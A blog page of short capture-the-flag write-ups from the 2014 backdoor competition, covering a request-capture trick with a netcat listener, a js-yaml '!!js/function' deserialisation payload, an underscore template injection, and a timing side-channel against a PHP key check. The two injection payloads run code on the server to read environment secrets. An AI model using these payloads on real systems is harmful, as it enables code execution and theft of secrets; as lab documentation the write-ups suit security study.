Mehran's Boring Blog

daily so-called-technical experiences

Mehran's Boring Blog

daily so-called-technical experiences

I found myself publishing things, which may or may not be taken seriously.

Subject Categories

Latest Comments

Recent Posts

۴ مطلب با موضوع «CTF :: backdoor :: 2014» ثبت شده است

Of course the web server has to "fetch" the image file to rate it. Let's see the request, just fire up a netcat -lkv 54321 and submit the image link http://YOURIP:54321/. You should get something like:
listening on [any] 54321 ...
connect to [YOURIP] from backdoor.cognizance.org.in [128.199.215.224] 46845
GET / HTTP/1.1
Host: YOURIP:54321
Accept: */*
X-Referrer: 92702a9381515494689f5d14f85a83b7.php

OK, there's some interesting Referrer waiting for us. What if we tried to go the url? Ooops, that's a super secret page, containing the message By the way, the flag is f556b9a48a3ee914f291f9b98645cb02 commented in HTML.
۴ comment Uppers ۰ Downers ۰ 23 March 14 ، 03:46
Mehran
Here's the app's code.

Pretty much like the web100-2 task, we should inject js code into the template, such that it has access to js global context.
That's not hard, just RTFM, and you'll see how load is considered unsafe, and should NOT be used to load untrusted data sources. Let's exploit it:

---
flag: !!js/function >
  function flag() {
    return process.env.FLAG;
  }
---
{{ flag }}

and take your flag away.
۰ comment Uppers ۰ Downers ۰ 23 March 14 ، 03:37
Mehran
Here's the app's code.
So, the underscore template is provided by the user. It's easy to execute arbitrary js code in the same context normal js code is run.
<%
print(process.env.FLAG);
%>

That's all.
۰ comment Uppers ۰ Downers ۰ 23 March 14 ، 03:29
Mehran

So, here's the PHP file in charge of authentication: See how line 12 is a conditional time-consuming statement. That may be (ab)used to launch a side channel attack: The amount of time a request takes to get processed is relative to the length of matched key prefix.
We may iterate over different characters until we observe significant (~200ms) increase in response time. That means we have that prefix matched, and we may continue to the remaining part.
Let's exploit it then:
Notes in the code:

  • You MUST use keep-alive to reuse the TCP connection for different requests, so that the network latency effect (which may be pretty random in case of TCP handshakes) is minimized
  • I've sent multiple requests to avoid random network glitches resulting in outcome-fuckery
۰ comment Uppers ۰ Downers ۰ 23 March 14 ، 03:01
Mehran